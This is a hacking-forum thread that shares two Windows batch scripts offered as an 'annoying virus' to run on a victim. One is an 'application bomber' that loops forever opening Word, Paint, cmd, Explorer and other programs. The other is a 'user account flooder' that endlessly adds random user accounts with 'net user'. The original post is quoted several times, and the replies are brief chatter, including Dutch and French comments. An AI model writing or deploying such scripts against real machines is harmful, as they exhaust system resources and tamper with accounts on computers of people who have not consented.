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Annonying Virus

by hax404inj3t404 - 04-09-2018 - 07:12 AM
1. Application Bomber @echo off // It instructs to hide the commands when batch files is executed :x //loop variable start winword start mspaint //open paint start notepad start write start cmd //open command prompt start explorer start control start calc // open calculator goto x // infinite loop This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and of course affecting performance. 2.User account flooder @echo off :x net user %random% /add //create user account goto x This code would start creating windows user accounts whose names could be any random numbers

sorry Guys I.m Posting From Mobile That Why The All Codes arent separate And Sorry For That :(
(04-09-2018 - 07:12 AM)hax404inj3t404 Wrote:
1. Application Bomber @echo off // It instructs to hide the commands when batch files is executed :x //loop variable start winword start mspaint //open paint start notepad start write start cmd //open command prompt start explorer start control start calc // open calculator goto x // infinite loop This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and of course affecting performance. 2.User account flooder @echo off :x net user %random% /add //create user account goto x This code would start creating windows user accounts whose names could be any random numbers

sorry Guys I.m Posting From Mobile That Why The All Codes arent separate And Sorry For That :(

I you are using mobile switch to "Desktop Mode" I did that when my computer needed charging. Then you can fix the code.
dimethylamine - Discord
ask me for it lol- Snapchat
My last visit was 12-24-2020 (currently 7-07-22 LOL, now it's 6-21-23 oops.)
thanks I know  that Btw   Tounge.
(04-09-2018 - 07:12 AM)hax404inj3t404 Wrote:
1. Application Bomber @echo off // It instructs to hide the commands when batch files is executed :x //loop variable start winword start mspaint //open paint start notepad start write start cmd //open command prompt start explorer start control start calc // open calculator goto x // infinite loop This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and of course affecting performance. 2.User account flooder @echo off :x net user %random% /add //create user account goto x This code would start creating windows user accounts whose names could be any random numbers

sorry Guys I.m Posting From Mobile That Why The All Codes arent separate And Sorry For That :(

kanus killl doe rustig kil het is niet funny
je n'ai rien compris
Giving a try, thanks

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